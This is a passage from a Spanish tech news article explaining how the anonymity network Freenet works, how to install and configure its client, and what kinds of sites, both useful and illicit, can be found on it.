Por lo tanto, podría describirse como una especie de caché gigantesco que se distribuye a través de sus nodos. Estos no están jerarquizados y se transmiten mensajes y documentos entre ellos. Los nodos pueden funcionar como nodos finales o intermedios de enrutamento: cada uno aloja documentos asociados a claves y una tabla de enrutamiento que asocia los nodos con un historial. Esto quiere decir que no hay conexiones directas ni reconocimiento de nodos, algo que garantiza un alto nivel de anonimato para todos los usuarios.


Freenet no es una darknet tan popular como la de Tor, pero sigue siendo un proyecto muy a tener en cuenta por las múltiples posibilidades que ofrece. Ian Clarke no sólo fue su padre, sino que a día de hoy sigue liderando el proyecto en un intento de garantizar que los internautas tengan una vía con garantías de mantener su privacidad en la red.



¿Cómo se utiliza Freenet?



Freenet Index


Conectarse a Freenet es tan fácil como entrar en su página web y descargarnos el ejecutable de conexión. Tiene versiones tanto para Windows como para Mac OS X y GNU/Linux. Además, por si somos unos curiosos que queremos crear nuestro propio cliente o aplicación que haga uso de sus principios, el código abierto del servicio está subido en GitHub.


El proceso de instalación es sencillo, aunque Windows en un principio nos lo detectará como un software peligroso y tendremos que darle a la opción de ejecutar igualmente.Se aconseja utilizar un navegador diferente al que usemos normalmente para navegar, a excepción de un Internet Explorer que no está recomendado.


Por defecto, al ejecutarlo se nos abrirá una ventana en Modo Incógnito en Chrome, pero si preferimos utilizar Opera o Firefox sólo tendremos que ingresar la dirección“http://127.0.0.1:8888” teniendo operativo el programa. En cualquier caso, con cualquier navegador que utilicemos se nos recomienda activar su modo privado.




Asistente Freenet


La primera vez que accedamos nos aparecerá un asistente que nos dará a elegir entre dos niveles de seguridad: Opennet y Darknet. Al principio posiblemente no tendremos más remedio que exponernos un poco conectándonos a cualquier usuario de la red para ofrecer al contenido, pero luego podremos conectarnos sólo a amigos y conocidos que hayan intercambiado sus referencias de nodo, algo así como una clave pública.


A continuación pasaremos a un segundo paso en el que, como hemos dicho, se recomienda usar modos privados para maximizar los niveles de seguridad. Después tendremos dos pasos más en los que ir eligiendo cuánto espacio queremos asignarle a la aplicación y el ancho de banda que estamos dispuestos a compartir.


Y ya está, una vez realizados estos pasos estaremos conectados a Freenet y el navegador nos llevará a su índice principal. En él se nos mostrarán enlaces a los tres principales directorios de contenido, páginas con enlaces y documentación relativa a la red, otras con software relacionado con el proyecto y una última sección con los blogs del equipo responsable.



¿Qué nos podemos encontrar en Freenet?



Nerdageddon


Como otros tipos de darknet como la de Tor, I2P, o ZeroNet, en Freenet podemos encontrarnos absolutamente de todo, desde consejos útiles y tutoriales imprescindibles hasta las páginas más aberrantes. Evidentemente, lo que siempre hace resaltar a estas últimas en la Deep Web no es tanto su cantidad, que también, como el hecho de que estén indexadas junto a otras bastante más inocentes y constructivas.


Afortunadamente para el caso concreto de Freenet, hay gente que se ha tomado la molestia de crear índices como el de Noerdageddon (el enlace sólo funciona con Freenet conectado). En esta página se ha eliminado todo el contenido pornográfico y que su creador haya considerado aburrido, y se han indexado únicamente enlaces a freesites de interés.


Entre las páginas que nos podemos encontrar aquí destacan, por ejemplo, páginas en español como LaWiki2p, en la que encontramos todo tipo de información sobre sistemas operativos y el mundo digital, la Guia Freenet sobre Redes Sociales, una imprescindible Guia para crear sitios en Freenet o blogs como este en el que se habla del mundo de la Deep Web.




Bookworm S Library


También podemos encontrarnos otras páginas en inglés con temáticas de lo más variopintas, como noticias sobre Freenet, filtraciones sobre el TTIP, un indice de eBooks, el navegador alternativo GNU IceCat o herramientas relacionadas con laseguridad y privacidad. También nos toparemos con una página dedicada enteramente a Vladimir Putin, otra sobre viñetas del Islam o una en la que nos hablan sobre la posible redistribución de una UE comunista


Pero donde hay luz también hay sobras, y en cuanto entremos en algunos de los otros varios índices de contenido disponibles no tardaremos en encontrar todo tipo de animaladas que muestran el lado más oscuro del ser humano: pedofilia, zoofilia, guías para suicidarse, venta de armas ilegales, fotos robadas de usuarios de MySpace, listados de contraseñas filtradas o venta de drogas.


En muchas páginas de información me he encontrado con gente que se refiere a Freenet como la gran olvidada dentro del mundo de la Deep Web. Y creo que es verdad, porque aunque apenas se oye hablar sobre ella la verdad es que tiene una muy amplia variedad de páginas y temáticas, tanto para bien como para mal.


Fuente:http://www.genbeta.com/


Noticias de seguridad informática